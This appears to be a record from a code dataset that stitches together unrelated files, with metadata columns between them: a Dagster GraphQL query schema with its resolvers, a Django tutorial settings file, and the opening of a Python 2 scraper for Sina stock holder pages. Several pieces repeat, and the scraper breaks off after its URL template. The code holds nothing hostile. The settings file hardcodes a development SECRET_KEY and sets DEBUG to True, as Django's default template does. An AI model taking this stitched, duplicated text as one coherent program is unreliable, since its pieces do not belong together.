"runConfigData": graphene.Argument(GrapheneRunConfigData),
"mode": graphene.Argument(graphene.NonNull(graphene.String)),
},
)
executionPlanOrError = graphene.Field(
graphene.NonNull(GrapheneExecutionPlanOrError),
args={
"pipeline": graphene.Argument(graphene.NonNull(GraphenePipelineSelector)),
"runConfigData": graphene.Argument(GrapheneRunConfigData),
"mode": graphene.Argument(graphene.NonNull(graphene.String)),
},
)
runConfigSchemaOrError = graphene.Field(
graphene.NonNull(GrapheneRunConfigSchemaOrError),
args={
"selector": graphene.Argument(graphene.NonNull(GraphenePipelineSelector)),
"mode": graphene.Argument(graphene.String),
},
description="""Fetch an environment schema given an execution selection and a mode.
See the descripton on RunConfigSchema for more information.""",
)
instance = graphene.NonNull(GrapheneInstance)
assetsOrError = graphene.Field(
graphene.NonNull(GrapheneAssetsOrError),
prefix=graphene.List(graphene.NonNull(graphene.String)),
cursor=graphene.String(),
limit=graphene.Int(),
)
assetOrError = graphene.Field(
graphene.NonNull(GrapheneAssetOrError),
assetKey=graphene.Argument(graphene.NonNull(GrapheneAssetKeyInput)),
)
assetNodes = graphene.Field(
non_null_list(GrapheneAssetNode),
pipeline=graphene.Argument(GraphenePipelineSelector),
assetKeys=graphene.Argument(graphene.List(graphene.NonNull(GrapheneAssetKeyInput))),
loadMaterializations=graphene.Boolean(default_value=False),
)
assetNodeOrError = graphene.Field(
graphene.NonNull(GrapheneAssetNodeOrError),
assetKey=graphene.Argument(graphene.NonNull(GrapheneAssetKeyInput)),
)
partitionBackfillOrError = graphene.Field(
graphene.NonNull(GraphenePartitionBackfillOrError),
backfillId=graphene.Argument(graphene.NonNull(graphene.String)),
)
partitionBackfillsOrError = graphene.Field(
graphene.NonNull(GraphenePartitionBackfillsOrError),
status=graphene.Argument(GrapheneBulkActionStatus),
cursor=graphene.String(),
limit=graphene.Int(),
)
permissions = graphene.Field(non_null_list(GraphenePermission))
def resolve_repositoriesOrError(self, graphene_info):
return fetch_repositories(graphene_info)
def resolve_repositoryOrError(self, graphene_info, **kwargs):
return fetch_repository(
graphene_info,
RepositorySelector.from_graphql_input(kwargs.get("repositorySelector")),
)
def resolve_workspaceOrError(self, graphene_info):
return fetch_workspace(graphene_info.context)
def resolve_pipelineSnapshotOrError(self, graphene_info, **kwargs):
snapshot_id_arg = kwargs.get("snapshotId")
pipeline_selector_arg = kwargs.get("activePipelineSelector")
check.invariant(
not (snapshot_id_arg and pipeline_selector_arg),
"Must only pass one of snapshotId or activePipelineSelector",
)
check.invariant(
snapshot_id_arg or pipeline_selector_arg,
"Must set one of snapshotId or activePipelineSelector",
)
if pipeline_selector_arg:
pipeline_selector = pipeline_selector_from_graphql(kwargs["activePipelineSelector"])
return get_pipeline_snapshot_or_error_from_pipeline_selector(
graphene_info, pipeline_selector
)
else:
return get_pipeline_snapshot_or_error_from_snapshot_id(graphene_info, snapshot_id_arg)
def resolve_graphOrError(self, graphene_info, **kwargs):
graph_selector = graph_selector_from_graphql(kwargs["selector"])
return get_graph_or_error(graphene_info, graph_selector)
def resolve_version(self, graphene_info):
return graphene_info.context.version
def resolve_scheduler(self, graphene_info):
return get_scheduler_or_error(graphene_info)
def resolve_scheduleOrError(self, graphene_info, schedule_selector):
return get_schedule_or_error(
graphene_info, ScheduleSelector.from_graphql_input(schedule_selector)
)
def resolve_schedulesOrError(self, graphene_info, **kwargs):
return get_schedules_or_error(
graphene_info,
RepositorySelector.from_graphql_input(kwargs.get("repositorySelector")),
)
def resolve_sensorOrError(self, graphene_info, sensorSelector):
return get_sensor_or_error(graphene_info, SensorSelector.from_graphql_input(sensorSelector))
def resolve_sensorsOrError(self, graphene_info, **kwargs):
return get_sensors_or_error(
graphene_info,
RepositorySelector.from_graphql_input(kwargs.get("repositorySelector")),
)
def resolve_instigationStateOrError(self, graphene_info, instigationSelector):
return get_job_state_or_error(
graphene_info, InstigationSelector.from_graphql_input(instigationSelector)
)
def resolve_unloadableInstigationStatesOrError(self, graphene_info, **kwargs):
job_type = (
InstigatorType(kwargs["instigationType"]) if "instigationType" in kwargs else None
)
return get_unloadable_job_states_or_error(graphene_info, job_type)
def resolve_pipelineOrError(self, graphene_info, **kwargs):
return get_pipeline_or_error(
graphene_info,
pipeline_selector_from_graphql(kwargs["params"]),
)
def resolve_pipelineRunsOrError(self, _graphene_info, **kwargs):
filters = kwargs.get("filter")
if filters is not None:
filters = filters.to_selector()
return GrapheneRuns(
filters=filters,
cursor=kwargs.get("cursor"),
limit=kwargs.get("limit"),
)
def resolve_pipelineRunOrError(self, graphene_info, runId):
return get_run_by_id(graphene_info, runId)
def resolve_runsOrError(self, _graphene_info, **kwargs):
filters = kwargs.get("filter")
if filters is not None:
filters = filters.to_selector()
return GrapheneRuns(
filters=filters,
cursor=kwargs.get("cursor"),
limit=kwargs.get("limit"),
)
def resolve_runOrError(self, graphene_info, runId):
return get_run_by_id(graphene_info, runId)
def resolve_runGroupsOrError(self, graphene_info, **kwargs):
filters = kwargs.get("filter")
if filters is not None:
filters = filters.to_selector()
return GrapheneRunGroupsOrError(
results=get_run_groups(
graphene_info, filters, kwargs.get("cursor"), kwargs.get("limit")
)
)
def resolve_partitionSetsOrError(self, graphene_info, **kwargs):
return get_partition_sets_or_error(
graphene_info,
RepositorySelector.from_graphql_input(kwargs.get("repositorySelector")),
kwargs.get("pipelineName"),
)
def resolve_partitionSetOrError(self, graphene_info, **kwargs):
return get_partition_set(
graphene_info,
RepositorySelector.from_graphql_input(kwargs.get("repositorySelector")),
kwargs.get("partitionSetName"),
)
def resolve_pipelineRunTags(self, graphene_info):
return get_run_tags(graphene_info)
def resolve_runGroupOrError(self, graphene_info, runId):
return get_run_group(graphene_info, runId)
def resolve_isPipelineConfigValid(self, graphene_info, pipeline, **kwargs):
return validate_pipeline_config(
graphene_info,
pipeline_selector_from_graphql(pipeline),
parse_run_config_input(kwargs.get("runConfigData", {})),
kwargs.get("mode"),
)
def resolve_executionPlanOrError(self, graphene_info, pipeline, **kwargs):
return get_execution_plan(
graphene_info,
pipeline_selector_from_graphql(pipeline),
parse_run_config_input(kwargs.get("runConfigData", {})),
kwargs.get("mode"),
)
def resolve_runConfigSchemaOrError(self, graphene_info, **kwargs):
return resolve_run_config_schema_or_error(
graphene_info,
pipeline_selector_from_graphql(kwargs["selector"]),
kwargs.get("mode"),
)
def resolve_instance(self, graphene_info):
return GrapheneInstance(graphene_info.context.instance)
def resolve_assetNodes(self, graphene_info, **kwargs):
asset_keys = set(
AssetKey.from_graphql_input(asset_key) for asset_key in kwargs.get("assetKeys", [])
)
if "pipeline" in kwargs:
pipeline_name = kwargs.get("pipeline").get("pipelineName")
repo_sel = RepositorySelector.from_graphql_input(kwargs.get("pipeline"))
repo_loc = graphene_info.context.get_repository_location(repo_sel.location_name)
repo = repo_loc.get_repository(repo_sel.repository_name)
external_asset_nodes = repo.get_external_asset_nodes(pipeline_name)
results = (
[GrapheneAssetNode(repo, asset_node) for asset_node in external_asset_nodes]
if external_asset_nodes
else []
)
else:
results = get_asset_nodes(graphene_info)
# Filter down to requested asset keys
results = [node for node in results if not asset_keys or node.assetKey in asset_keys]
if not results:
return []
materialization_loader = BatchMaterializationLoader(
instance=graphene_info.context.instance, asset_keys=[node.assetKey for node in results]
)
return [
GrapheneAssetNode(
node.get_external_repository(),
node.get_external_asset_node(),
materialization_loader=materialization_loader,
)
for node in results
]
def resolve_assetNodeOrError(self, graphene_info, **kwargs):
return get_asset_node(graphene_info, AssetKey.from_graphql_input(kwargs["assetKey"]))
def resolve_assetsOrError(self, graphene_info, **kwargs):
return get_assets(
graphene_info,
prefix=kwargs.get("prefix"),
cursor=kwargs.get("cursor"),
limit=kwargs.get("limit"),
)
def resolve_assetOrError(self, graphene_info, **kwargs):
return get_asset(graphene_info, AssetKey.from_graphql_input(kwargs["assetKey"]))
def resolve_partitionBackfillOrError(self, graphene_info, backfillId):
return get_backfill(graphene_info, backfillId)
def resolve_partitionBackfillsOrError(self, graphene_info, **kwargs):
status = kwargs.get("status")
return get_backfills(
graphene_info,
status=BulkActionStatus.from_graphql_input(status) if status else None,
cursor=kwargs.get("cursor"),
limit=kwargs.get("limit"),
)
def resolve_permissions(self, graphene_info):
permissions = graphene_info.context.permissions
return [GraphenePermission(permission, value) for permission, value in permissions.items()]
| 38.087576 | 100 | 0.71825 | import graphene
from dagster import check
from dagster.core.definitions.events import AssetKey
from dagster.core.execution.backfill import BulkActionStatus
from dagster.core.host_representation import (
InstigationSelector,
RepositorySelector,
ScheduleSelector,
SensorSelector,
)
from dagster.core.scheduler.instigation import InstigatorType
from ...implementation.external import fetch_repositories, fetch_repository, fetch_workspace
from ...implementation.fetch_assets import get_asset, get_asset_node, get_asset_nodes, get_assets
from ...implementation.fetch_backfills import get_backfill, get_backfills
from ...implementation.fetch_jobs import get_job_state_or_error, get_unloadable_job_states_or_error
from ...implementation.fetch_partition_sets import get_partition_set, get_partition_sets_or_error
from ...implementation.fetch_pipelines import (
get_pipeline_or_error,
get_pipeline_snapshot_or_error_from_pipeline_selector,
get_pipeline_snapshot_or_error_from_snapshot_id,
)
from ...implementation.fetch_runs import (
get_execution_plan,
get_run_by_id,
get_run_group,
get_run_groups,
get_run_tags,
validate_pipeline_config,
)
from ...implementation.fetch_schedules import (
get_schedule_or_error,
get_scheduler_or_error,
get_schedules_or_error,
)
from ...implementation.fetch_sensors import get_sensor_or_error, get_sensors_or_error
from ...implementation.fetch_solids import get_graph_or_error
from ...implementation.loader import BatchMaterializationLoader
from ...implementation.run_config_schema import resolve_run_config_schema_or_error
from ...implementation.utils import graph_selector_from_graphql, pipeline_selector_from_graphql
from ..asset_graph import GrapheneAssetNode, GrapheneAssetNodeOrError
from ..backfill import (
GrapheneBulkActionStatus,
GraphenePartitionBackfillOrError,
GraphenePartitionBackfillsOrError,
)
from ..external import (
GrapheneRepositoriesOrError,
GrapheneRepositoryOrError,
GrapheneWorkspaceOrError,
)
from ..inputs import (
GrapheneAssetKeyInput,
GrapheneGraphSelector,
GrapheneInstigationSelector,
GraphenePipelineSelector,
GrapheneRepositorySelector,
GrapheneRunsFilter,
GrapheneScheduleSelector,
GrapheneSensorSelector,
)
from ..instance import GrapheneInstance
from ..instigation import (
GrapheneInstigationStateOrError,
GrapheneInstigationStatesOrError,
GrapheneInstigationType,
)
from ..partition_sets import GraphenePartitionSetOrError, GraphenePartitionSetsOrError
from ..permissions import GraphenePermission
from ..pipelines.config_result import GraphenePipelineConfigValidationResult
from ..pipelines.pipeline import GrapheneRunOrError
from ..pipelines.snapshot import GraphenePipelineSnapshotOrError
from ..run_config import GrapheneRunConfigSchemaOrError
from ..runs import (
GrapheneRunConfigData,
GrapheneRunGroupOrError,
GrapheneRunGroupsOrError,
GrapheneRuns,
GrapheneRunsOrError,
parse_run_config_input,
)
from ..schedules import GrapheneScheduleOrError, GrapheneSchedulerOrError, GrapheneSchedulesOrError
from ..sensors import GrapheneSensorOrError, GrapheneSensorsOrError
from ..tags import GraphenePipelineTagAndValues
from ..util import non_null_list
from .assets import GrapheneAssetOrError, GrapheneAssetsOrError
from .execution_plan import GrapheneExecutionPlanOrError
from .pipeline import GrapheneGraphOrError, GraphenePipelineOrError
class GrapheneDagitQuery(graphene.ObjectType):
class Meta:
name = "DagitQuery"
version = graphene.NonNull(graphene.String)
repositoriesOrError = graphene.NonNull(GrapheneRepositoriesOrError)
repositoryOrError = graphene.Field(
graphene.NonNull(GrapheneRepositoryOrError),
repositorySelector=graphene.NonNull(GrapheneRepositorySelector),
)
workspaceOrError = graphene.NonNull(GrapheneWorkspaceOrError)
pipelineOrError = graphene.Field(
graphene.NonNull(GraphenePipelineOrError), params=graphene.NonNull(GraphenePipelineSelector)
)
pipelineSnapshotOrError = graphene.Field(
graphene.NonNull(GraphenePipelineSnapshotOrError),
snapshotId=graphene.String(),
activePipelineSelector=graphene.Argument(GraphenePipelineSelector),
)
graphOrError = graphene.Field(
graphene.NonNull(GrapheneGraphOrError),
selector=graphene.Argument(GrapheneGraphSelector),
)
scheduler = graphene.Field(graphene.NonNull(GrapheneSchedulerOrError))
scheduleOrError = graphene.Field(
graphene.NonNull(GrapheneScheduleOrError),
schedule_selector=graphene.NonNull(GrapheneScheduleSelector),
)
schedulesOrError = graphene.Field(
graphene.NonNull(GrapheneSchedulesOrError),
repositorySelector=graphene.NonNull(GrapheneRepositorySelector),
)
sensorOrError = graphene.Field(
graphene.NonNull(GrapheneSensorOrError),
sensorSelector=graphene.NonNull(GrapheneSensorSelector),
)
sensorsOrError = graphene.Field(
graphene.NonNull(GrapheneSensorsOrError),
repositorySelector=graphene.NonNull(GrapheneRepositorySelector),
)
instigationStateOrError = graphene.Field(
graphene.NonNull(GrapheneInstigationStateOrError),
instigationSelector=graphene.NonNull(GrapheneInstigationSelector),
)
unloadableInstigationStatesOrError = graphene.Field(
graphene.NonNull(GrapheneInstigationStatesOrError),
instigationType=graphene.Argument(GrapheneInstigationType),
)
partitionSetsOrError = graphene.Field(
graphene.NonNull(GraphenePartitionSetsOrError),
repositorySelector=graphene.NonNull(GrapheneRepositorySelector),
pipelineName=graphene.NonNull(graphene.String),
)
partitionSetOrError = graphene.Field(
graphene.NonNull(GraphenePartitionSetOrError),
repositorySelector=graphene.NonNull(GrapheneRepositorySelector),
partitionSetName=graphene.String(),
)
pipelineRunsOrError = graphene.Field(
graphene.NonNull(GrapheneRunsOrError),
filter=graphene.Argument(GrapheneRunsFilter),
cursor=graphene.String(),
limit=graphene.Int(),
)
pipelineRunOrError = graphene.Field(
graphene.NonNull(GrapheneRunOrError), runId=graphene.NonNull(graphene.ID)
)
runsOrError = graphene.Field(
graphene.NonNull(GrapheneRunsOrError),
filter=graphene.Argument(GrapheneRunsFilter),
cursor=graphene.String(),
limit=graphene.Int(),
)
runOrError = graphene.Field(
graphene.NonNull(GrapheneRunOrError), runId=graphene.NonNull(graphene.ID)
)
pipelineRunTags = non_null_list(GraphenePipelineTagAndValues)
runGroupOrError = graphene.Field(
graphene.NonNull(GrapheneRunGroupOrError), runId=graphene.NonNull(graphene.ID)
)
runGroupsOrError = graphene.Field(
graphene.NonNull(GrapheneRunGroupsOrError),
filter=graphene.Argument(GrapheneRunsFilter),
cursor=graphene.String(),
limit=graphene.Int(),
)
isPipelineConfigValid = graphene.Field(
graphene.NonNull(GraphenePipelineConfigValidationResult),
args={
"pipeline": graphene.Argument(graphene.NonNull(GraphenePipelineSelector)),
"runConfigData": graphene.Argument(GrapheneRunConfigData),
"mode": graphene.Argument(graphene.NonNull(graphene.String)),
},
)
executionPlanOrError = graphene.Field(
graphene.NonNull(GrapheneExecutionPlanOrError),
args={
"pipeline": graphene.Argument(graphene.NonNull(GraphenePipelineSelector)),
"runConfigData": graphene.Argument(GrapheneRunConfigData),
"mode": graphene.Argument(graphene.NonNull(graphene.String)),
},
)
runConfigSchemaOrError = graphene.Field(
graphene.NonNull(GrapheneRunConfigSchemaOrError),
args={
"selector": graphene.Argument(graphene.NonNull(GraphenePipelineSelector)),
"mode": graphene.Argument(graphene.String),
},
description="""Fetch an environment schema given an execution selection and a mode.
See the descripton on RunConfigSchema for more information.""",
)
instance = graphene.NonNull(GrapheneInstance)
assetsOrError = graphene.Field(
graphene.NonNull(GrapheneAssetsOrError),
prefix=graphene.List(graphene.NonNull(graphene.String)),
cursor=graphene.String(),
limit=graphene.Int(),
)
assetOrError = graphene.Field(
graphene.NonNull(GrapheneAssetOrError),
assetKey=graphene.Argument(graphene.NonNull(GrapheneAssetKeyInput)),
)
assetNodes = graphene.Field(
non_null_list(GrapheneAssetNode),
pipeline=graphene.Argument(GraphenePipelineSelector),
assetKeys=graphene.Argument(graphene.List(graphene.NonNull(GrapheneAssetKeyInput))),
loadMaterializations=graphene.Boolean(default_value=False),
)
assetNodeOrError = graphene.Field(
graphene.NonNull(GrapheneAssetNodeOrError),
assetKey=graphene.Argument(graphene.NonNull(GrapheneAssetKeyInput)),
)
partitionBackfillOrError = graphene.Field(
graphene.NonNull(GraphenePartitionBackfillOrError),
backfillId=graphene.Argument(graphene.NonNull(graphene.String)),
)
partitionBackfillsOrError = graphene.Field(
graphene.NonNull(GraphenePartitionBackfillsOrError),
status=graphene.Argument(GrapheneBulkActionStatus),
cursor=graphene.String(),
limit=graphene.Int(),
)
permissions = graphene.Field(non_null_list(GraphenePermission))
def resolve_repositoriesOrError(self, graphene_info):
return fetch_repositories(graphene_info)
def resolve_repositoryOrError(self, graphene_info, **kwargs):
return fetch_repository(
graphene_info,
RepositorySelector.from_graphql_input(kwargs.get("repositorySelector")),
)
def resolve_workspaceOrError(self, graphene_info):
return fetch_workspace(graphene_info.context)
def resolve_pipelineSnapshotOrError(self, graphene_info, **kwargs):
snapshot_id_arg = kwargs.get("snapshotId")
pipeline_selector_arg = kwargs.get("activePipelineSelector")
check.invariant(
not (snapshot_id_arg and pipeline_selector_arg),
"Must only pass one of snapshotId or activePipelineSelector",
)
check.invariant(
snapshot_id_arg or pipeline_selector_arg,
"Must set one of snapshotId or activePipelineSelector",
)
if pipeline_selector_arg:
pipeline_selector = pipeline_selector_from_graphql(kwargs["activePipelineSelector"])
return get_pipeline_snapshot_or_error_from_pipeline_selector(
graphene_info, pipeline_selector
)
else:
return get_pipeline_snapshot_or_error_from_snapshot_id(graphene_info, snapshot_id_arg)
def resolve_graphOrError(self, graphene_info, **kwargs):
graph_selector = graph_selector_from_graphql(kwargs["selector"])
return get_graph_or_error(graphene_info, graph_selector)
def resolve_version(self, graphene_info):
return graphene_info.context.version
def resolve_scheduler(self, graphene_info):
return get_scheduler_or_error(graphene_info)
def resolve_scheduleOrError(self, graphene_info, schedule_selector):
return get_schedule_or_error(
graphene_info, ScheduleSelector.from_graphql_input(schedule_selector)
)
def resolve_schedulesOrError(self, graphene_info, **kwargs):
return get_schedules_or_error(
graphene_info,
RepositorySelector.from_graphql_input(kwargs.get("repositorySelector")),
)
def resolve_sensorOrError(self, graphene_info, sensorSelector):
return get_sensor_or_error(graphene_info, SensorSelector.from_graphql_input(sensorSelector))
def resolve_sensorsOrError(self, graphene_info, **kwargs):
return get_sensors_or_error(
graphene_info,
RepositorySelector.from_graphql_input(kwargs.get("repositorySelector")),
)
def resolve_instigationStateOrError(self, graphene_info, instigationSelector):
return get_job_state_or_error(
graphene_info, InstigationSelector.from_graphql_input(instigationSelector)
)
def resolve_unloadableInstigationStatesOrError(self, graphene_info, **kwargs):
job_type = (
InstigatorType(kwargs["instigationType"]) if "instigationType" in kwargs else None
)
return get_unloadable_job_states_or_error(graphene_info, job_type)
def resolve_pipelineOrError(self, graphene_info, **kwargs):
return get_pipeline_or_error(
graphene_info,
pipeline_selector_from_graphql(kwargs["params"]),
)
def resolve_pipelineRunsOrError(self, _graphene_info, **kwargs):
filters = kwargs.get("filter")
if filters is not None:
filters = filters.to_selector()
return GrapheneRuns(
filters=filters,
cursor=kwargs.get("cursor"),
limit=kwargs.get("limit"),
)
def resolve_pipelineRunOrError(self, graphene_info, runId):
return get_run_by_id(graphene_info, runId)
def resolve_runsOrError(self, _graphene_info, **kwargs):
filters = kwargs.get("filter")
if filters is not None:
filters = filters.to_selector()
return GrapheneRuns(
filters=filters,
cursor=kwargs.get("cursor"),
limit=kwargs.get("limit"),
)
def resolve_runOrError(self, graphene_info, runId):
return get_run_by_id(graphene_info, runId)
def resolve_runGroupsOrError(self, graphene_info, **kwargs):
filters = kwargs.get("filter")
if filters is not None:
filters = filters.to_selector()
return GrapheneRunGroupsOrError(
results=get_run_groups(
graphene_info, filters, kwargs.get("cursor"), kwargs.get("limit")
)
)
def resolve_partitionSetsOrError(self, graphene_info, **kwargs):
return get_partition_sets_or_error(
graphene_info,
RepositorySelector.from_graphql_input(kwargs.get("repositorySelector")),
kwargs.get("pipelineName"),
)
def resolve_partitionSetOrError(self, graphene_info, **kwargs):
return get_partition_set(
graphene_info,
RepositorySelector.from_graphql_input(kwargs.get("repositorySelector")),
kwargs.get("partitionSetName"),
)
def resolve_pipelineRunTags(self, graphene_info):
return get_run_tags(graphene_info)
def resolve_runGroupOrError(self, graphene_info, runId):
return get_run_group(graphene_info, runId)
def resolve_isPipelineConfigValid(self, graphene_info, pipeline, **kwargs):
return validate_pipeline_config(
graphene_info,
pipeline_selector_from_graphql(pipeline),
parse_run_config_input(kwargs.get("runConfigData", {})),
kwargs.get("mode"),
)
def resolve_executionPlanOrError(self, graphene_info, pipeline, **kwargs):
return get_execution_plan(
graphene_info,
pipeline_selector_from_graphql(pipeline),
parse_run_config_input(kwargs.get("runConfigData", {})),
kwargs.get("mode"),
)
def resolve_runConfigSchemaOrError(self, graphene_info, **kwargs):
return resolve_run_config_schema_or_error(
graphene_info,
pipeline_selector_from_graphql(kwargs["selector"]),
kwargs.get("mode"),
)
def resolve_instance(self, graphene_info):
return GrapheneInstance(graphene_info.context.instance)
def resolve_assetNodes(self, graphene_info, **kwargs):
asset_keys = set(
AssetKey.from_graphql_input(asset_key) for asset_key in kwargs.get("assetKeys", [])
)
if "pipeline" in kwargs:
pipeline_name = kwargs.get("pipeline").get("pipelineName")
repo_sel = RepositorySelector.from_graphql_input(kwargs.get("pipeline"))
repo_loc = graphene_info.context.get_repository_location(repo_sel.location_name)
repo = repo_loc.get_repository(repo_sel.repository_name)
external_asset_nodes = repo.get_external_asset_nodes(pipeline_name)
results = (
[GrapheneAssetNode(repo, asset_node) for asset_node in external_asset_nodes]
if external_asset_nodes
else []
)
else:
results = get_asset_nodes(graphene_info)
results = [node for node in results if not asset_keys or node.assetKey in asset_keys]
if not results:
return []
materialization_loader = BatchMaterializationLoader(
instance=graphene_info.context.instance, asset_keys=[node.assetKey for node in results]
)
return [
GrapheneAssetNode(
node.get_external_repository(),
node.get_external_asset_node(),
materialization_loader=materialization_loader,
)
for node in results
]
def resolve_assetNodeOrError(self, graphene_info, **kwargs):
return get_asset_node(graphene_info, AssetKey.from_graphql_input(kwargs["assetKey"]))
def resolve_assetsOrError(self, graphene_info, **kwargs):
return get_assets(
graphene_info,
prefix=kwargs.get("prefix"),
cursor=kwargs.get("cursor"),
limit=kwargs.get("limit"),
)
def resolve_assetOrError(self, graphene_info, **kwargs):
return get_asset(graphene_info, AssetKey.from_graphql_input(kwargs["assetKey"]))
def resolve_partitionBackfillOrError(self, graphene_info, backfillId):
return get_backfill(graphene_info, backfillId)
def resolve_partitionBackfillsOrError(self, graphene_info, **kwargs):
status = kwargs.get("status")
return get_backfills(
graphene_info,
status=BulkActionStatus.from_graphql_input(status) if status else None,
cursor=kwargs.get("cursor"),
limit=kwargs.get("limit"),
)
def resolve_permissions(self, graphene_info):
permissions = graphene_info.context.permissions
return [GraphenePermission(permission, value) for permission, value in permissions.items()]
| true | true |
1c4a6b7f9a2cd7b57e29cb5f2d14e1917bfc20b7 | 3,448 | py | Python | tutorial/settings.py | cyndi088/tutorial | 4a1e373554b827fce1719fe49e1e49412eaa7af5 | [
"MIT"
] | null | null | null | tutorial/settings.py | cyndi088/tutorial | 4a1e373554b827fce1719fe49e1e49412eaa7af5 | [
"MIT"
] | 2 | 2020-01-09T07:58:53.000Z | 2020-02-12T14:57:46.000Z | tutorial/settings.py | cyndi088/tutorial | 4a1e373554b827fce1719fe49e1e49412eaa7af5 | [
"MIT"
] | null | null | null | """
Django settings for tutorial project.
Generated by 'django-admin startproject' using Django 2.2.7.
For more information on this file, see
https://docs.djangoproject.com/en/2.2/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.2/ref/settings/
"""
import os
import sys
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
sys.path.insert(0, os.path.join(BASE_DIR, 'tutorial'))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.2/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '5nrnq$kj)nxh9@u-v#n83(9d4@x1r-vk%+%_5)!6$1smwy2-y&'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'rest_framework',
'tutorial.snippets',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'tutorial.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'tutorial.wsgi.application'
# Database
# https://docs.djangoproject.com/en/2.2/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# LOGIN_REDIRECT_URL = '/admin' # 登录后重定向页面
# Password validation
# https://docs.djangoproject.com/en/2.2/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/2.2/topics/i18n/
LANGUAGE_CODE = 'en-us'
# LANGUAGE_CODE = 'zh-Hans'
# TIME_ZONE = 'UTC'
TIME_ZONE = 'Asia/Shanghai'
USE_I18N = True
USE_L10N = True
USE_TZ = False
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.2/howto/static-files/
STATIC_URL = '/static/'
# Pagination
REST_FRAMEWORK = {
'DEFAULT_PAGINATION_CLASS': 'rest_framework.pagination.PageNumberPagination',
'PAGE_SIZE': 10
} | 25.540741 | 91 | 0.697506 |
import os
import sys
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
sys.path.insert(0, os.path.join(BASE_DIR, 'tutorial'))
SECRET_KEY = '5nrnq$kj)nxh9@u-v#n83(9d4@x1r-vk%+%_5)!6$1smwy2-y&'
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'rest_framework',
'tutorial.snippets',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'tutorial.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'tutorial.wsgi.application'
# Database
# https://docs.djangoproject.com/en/2.2/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# LOGIN_REDIRECT_URL = '/admin' # 登录后重定向页面
# Password validation
# https://docs.djangoproject.com/en/2.2/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/2.2/topics/i18n/
LANGUAGE_CODE = 'en-us'
# LANGUAGE_CODE = 'zh-Hans'
# TIME_ZONE = 'UTC'
TIME_ZONE = 'Asia/Shanghai'
USE_I18N = True
USE_L10N = True
USE_TZ = False
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.2/howto/static-files/
STATIC_URL = '/static/'
# Pagination
REST_FRAMEWORK = {
'DEFAULT_PAGINATION_CLASS': 'rest_framework.pagination.PageNumberPagination',
'PAGE_SIZE': 10
} | true | true |
1c4a6d7a93c31fd531179e05b0100a24784018f5 | 1,342 | py | Python | gudong/dumpData.py | happy6666/stockStrategies | 01ac608d1f69a7318d168036e8e6f77aa95c649c | [
"Apache-2.0"
] | null | null | null | gudong/dumpData.py | happy6666/stockStrategies | 01ac608d1f69a7318d168036e8e6f77aa95c649c | [
"Apache-2.0"
] | 1 | 2019-11-04T07:56:09.000Z | 2019-11-04T07:56:09.000Z | gudong/dumpData.py | happy6666/stockStrategies | 01ac608d1f69a7318d168036e8e6f77aa95c649c | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/python
# coding: utf-8
import sys
import time
import urllib2
from bs4 import BeautifulSoup
req='http://vip.stock.finance.sina.com.cn/corp/go.php/vCI_StockHolder/stockid/%s/displaytype/30.phtml';
